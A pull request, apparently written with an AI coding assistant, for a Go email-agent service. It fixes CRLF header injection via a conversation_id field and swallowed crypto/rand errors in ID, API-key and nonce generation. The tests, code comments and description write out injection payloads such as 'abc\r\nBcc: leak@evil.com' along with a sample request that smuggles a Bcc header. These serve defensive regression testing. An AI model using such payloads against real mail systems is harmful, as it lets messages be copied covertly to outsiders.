### PR TITLE
fix(security): block header injection via conversation_id, panic on rand failures

### DIFF
--- a/internal/agent/api.go
+++ b/internal/agent/api.go
@@ -982,6 +982,10 @@ func (a *API) handleSendEmail(w http.ResponseWriter, r *http.Request) {
 		http.Error(w, "at least one recipient in to or cc is required", http.StatusBadRequest)
 		return
 	}
+	if err := validateConversationID(req.ConversationID); err != nil {
+		http.Error(w, err.Error(), http.StatusBadRequest)
+		return
+	}
 
 	// Resolve agent from "from" field, or auto-select if user has exactly one agent
 	var agent *identity.AgentIdentity
@@ -1201,6 +1205,10 @@ func (a *API) handleReplyToMessage(w http.ResponseWriter, r *http.Request) {
 	}
 	if req.Body == "" {
 		http.Error(w, "body is required", http.StatusBadRequest)
+		return
+	}
+	if err := validateConversationID(req.ConversationID); err != nil {
+		http.Error(w, err.Error(), http.StatusBadRequest)
 		return
 	}
 
@@ -1644,6 +1652,21 @@ func truncate(s string, maxLen int) string {
 		return string(runes[:maxLen-3]) + "..."
 	}
 	return s
+}
+
+// validateConversationID rejects values containing CR or LF. The
+// composer treats conversation_id as a passthrough for the
+// X-E2A-Conversation-ID header; allowing CRLF would let any
+// authenticated caller smuggle additional headers (Bcc, fake
+// DKIM-Signature, body smuggling) into the outbound MIME message.
+// Defense-in-depth: the composer also strips CRLF, but rejecting
+// at the boundary gives the caller a clear 400 instead of silently
+// neutralising their input.
+func validateConversationID(id string) error {
+	if strings.ContainsAny(id, "\r\n") {
+		return errors.New("conversation_id must not contain CR or LF")
+	}
+	return nil
 }
 
 func clientIP(r *http.Request) string {

--- a/internal/agent/validate_test.go
+++ b/internal/agent/validate_test.go
@@ -1,0 +1,26 @@
+package agent
+
+import "testing"
+
+func TestValidateConversationID(t *testing.T) {
+	cases := []struct {
+		name    string
+		id      string
+		wantErr bool
+	}{
+		{"empty", "", false},
+		{"normal", "conv_abc123", false},
+		{"with hyphens and dots", "task.2026-04-19.7f3a", false},
+		{"contains LF — header injection attempt", "abc\nBcc: leak@evil.com", true},
+		{"contains CRLF — header injection attempt", "abc\r\nBcc: leak@evil.com", true},
+		{"lone CR", "abc\rdef", true},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			err := validateConversationID(tc.id)
+			if (err != nil) != tc.wantErr {
+				t.Errorf("validateConversationID(%q) err=%v, wantErr=%v", tc.id, err, tc.wantErr)
+			}
+		})
+	}
+}

--- a/internal/auth/auth.go
+++ b/internal/auth/auth.go
@@ -152,7 +152,12 @@ func NewUserAuthWithOAuthConfig(cfg *config.OAuthConfig, oauthCfg *oauth2.Config
 
 func generateNonce() string {
 	b := make([]byte, 16)
-	rand.Read(b)
+	if _, err := rand.Read(b); err != nil {
+		// OAuth state nonce — an all-zero nonce defeats the CSRF
+		// protection it exists to provide. Panic rather than silently
+		// emit a predictable value.
+		panic(fmt.Sprintf("auth: crypto/rand failed: %v", err))
+	}
 	return hex.EncodeToString(b)
 }
 

--- a/internal/identity/store.go
+++ b/internal/identity/store.go
@@ -1742,13 +1742,22 @@ func (s *Store) GetUserByAPIKey(ctx context.Context, apiKey string) (*User, erro
 
 func generateID() string {
 	b := make([]byte, 16)
-	rand.Read(b)
+	if _, err := rand.Read(b); err != nil {
+		// crypto/rand failure means the OS RNG is broken — without it
+		// we'd silently emit an all-zero ID. Panic to surface a 500
+		// rather than poison the database with predictable identifiers.
+		panic(fmt.Sprintf("identity: crypto/rand failed: %v", err))
+	}
 	return hex.EncodeToString(b)
 }
 
 func generateAPIKey() string {
 	b := make([]byte, 32)
-	rand.Read(b)
+	if _, err := rand.Read(b); err != nil {
+		// Same reasoning as generateID — an all-zero API key would be
+		// catastrophic (predictable auth credential).
+		panic(fmt.Sprintf("identity: crypto/rand failed: %v", err))
+	}
 	return "e2a_" + hex.EncodeToString(b)
 }
 

--- a/internal/outbound/compose.go
+++ b/internal/outbound/compose.go
@@ -223,9 +223,25 @@ func headerWriter(buf *strings.Builder) func(string, string) {
 	return func(key, value string) {
 		buf.WriteString(textproto.CanonicalMIMEHeaderKey(key))
 		buf.WriteString(": ")
-		buf.WriteString(value)
+		buf.WriteString(sanitizeHeaderValue(value))
 		buf.WriteString("\r\n")
 	}
+}
+
+// sanitizeHeaderValue strips CR and LF to prevent header injection.
+// Without this, an attacker-controlled value like "abc\r\nBcc: leak@evil.com"
+// in conversation_id (or any other passthrough header) would smuggle
+// arbitrary headers into the composed message — a blind-Bcc /
+// fake-DKIM-Signature primitive available to any authenticated user.
+// Stripping is preferred over rejecting so the request still succeeds
+// with the malicious bytes neutralised; the API layer additionally
+// validates conversation_id and returns 400 on CRLF, but this is the
+// last line of defense for any future caller.
+func sanitizeHeaderValue(s string) string {
+	if !strings.ContainsAny(s, "\r\n") {
+		return s
+	}
+	return strings.NewReplacer("\r", "", "\n", "").Replace(s)
 }
 
 func generateBoundary() string {

--- a/internal/outbound/compose_test.go
+++ b/internal/outbound/compose_test.go
@@ -325,3 +325,40 @@ func TestComposeMultipartMessageConversationIDHeader(t *testing.T) {
 		t.Errorf("X-E2A-Conversation-Id = %q, want conv-xyz", got)
 	}
 }
+
+// Regression: an attacker-controlled conversation_id containing CR/LF must
+// not smuggle additional headers (e.g. blind Bcc) into the composed
+// message. The header writer strips CR and LF from values as last-line
+// defense; the API layer also rejects with 400, but the composer must
+// remain safe even if a future caller forgets to validate.
+func TestComposeMessageStripsCRLFFromConversationID(t *testing.T) {
+	malicious := "abc\r\nBcc: leak@attacker.com"
+	out, err := ComposeMessage(
+		"sender@agents.e2a.dev",
+		[]string{"target@victim.com"}, nil,
+		"hi", "benign", "text/plain",
+		"", "agents.e2a.dev", "",
+		malicious,
+	)
+	if err != nil {
+		t.Fatalf("ComposeMessage failed: %v", err)
+	}
+	msg := string(out)
+
+	// Injection would manifest as a fresh header line — i.e. CRLF
+	// followed by "Bcc:" — anywhere in the message.
+	if strings.Contains(msg, "\r\nBcc:") {
+		t.Errorf("header injection: smuggled Bcc started a new header line\n%s", msg)
+	}
+	parsed, err := mail.ReadMessage(strings.NewReader(msg))
+	if err != nil {
+		t.Fatalf("composed message not parseable: %v", err)
+	}
+	got := parsed.Header.Get("X-E2A-Conversation-Id")
+	if want := "abcBcc: leak@attacker.com"; got != want {
+		t.Errorf("X-E2A-Conversation-Id = %q, want %q (CR/LF stripped, remaining bytes intact)", got, want)
+	}
+	if parsed.Header.Get("Bcc") != "" {
+		t.Errorf("Bcc header should be absent, got %q", parsed.Header.Get("Bcc"))
+	}
+}


### PR DESCRIPTION
## Summary

Two security fixes from a codebase audit. Both are short, mechanical, and worth shipping immediately.

### 1. Header injection via `conversation_id` (high severity)

`ComposeMessage` wrote attacker-controlled values straight into the `X-E2A-Conversation-ID` header with no CRLF stripping. An authenticated user calling `POST /api/v1/send` with:

```json
{ "to": ["target@victim.com"], "subject": "hi", "body": "...",
  "conversation_id": "abc\r\nBcc: leak@attacker.com" }
```

…would get a composed RFC 5322 message with a smuggled `Bcc:` header. Same vector available for fake `DKIM-Signature`, body smuggling, etc. **Reproduced via test before the fix; test now passes.**

Two-layer fix:
- `sanitizeHeaderValue` in `headerWriter` strips CR/LF as last-line defense — protects any future caller that forgets to validate.
- `validateConversationID` at the API boundary returns 400 on CRLF so users see a clear error instead of their input being silently neutralised.

### 2. Silent all-zero secrets on `crypto/rand` failure

`generateID`, `generateAPIKey`, and `generateNonce` swallowed `crypto/rand.Read` errors. If the RNG ever fails (rare on Linux, possible on resource-exhausted Windows), the buffer stays all-zero and we'd produce all-zero IDs / API keys / OAuth nonces. All-zero API keys would be catastrophic.

The codebase already has the right pattern in `generateBoundary` and `generateSigningSecret` (panic on error). These three are now consistent.

## Test plan

- [x] `go test ./internal/outbound/` — header-injection regression test passes (was failing before fix)
- [x] `go test ./internal/agent/` — `validateConversationID` table test covers CR / LF / CRLF
- [x] `make test-unit` — all green
- [ ] CI

🤖 Generated with [Claude Code](https://claude.com/claude-code)